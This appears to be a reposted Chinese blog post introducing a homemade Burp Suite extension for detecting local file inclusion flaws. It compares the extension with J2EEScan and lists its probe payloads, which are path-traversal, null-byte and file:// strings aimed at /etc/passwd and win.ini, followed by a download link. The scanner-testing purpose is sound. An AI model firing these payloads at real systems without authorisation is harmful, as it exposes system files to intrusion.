LFI scanner checks是为了我自己为burp轻量级扫描器做的一个检测LFI漏洞插件,因为burp没有一个有效的检测LFI功能的,只能自己写一个插件了。
先看下截图:
来对比下J2EESCAN里面附带的LFI探测
下面是安装上 LFI scanner checks
我使用的payload如下
../../../../../../../../../../../../../../../../etc/passwd%00.html
../../../../../../../../../../../../../../../../etc/passwd
file:///etc/passwd
file:///c:/windows/win.ini
../../../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../../../windows/win.ini%00.html
如果有好的建议,可以在评论中留言
下载地址
链接: http://pan.baidu.com/s/1gdfITIN 密码: 4fv7
文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/135060.html<
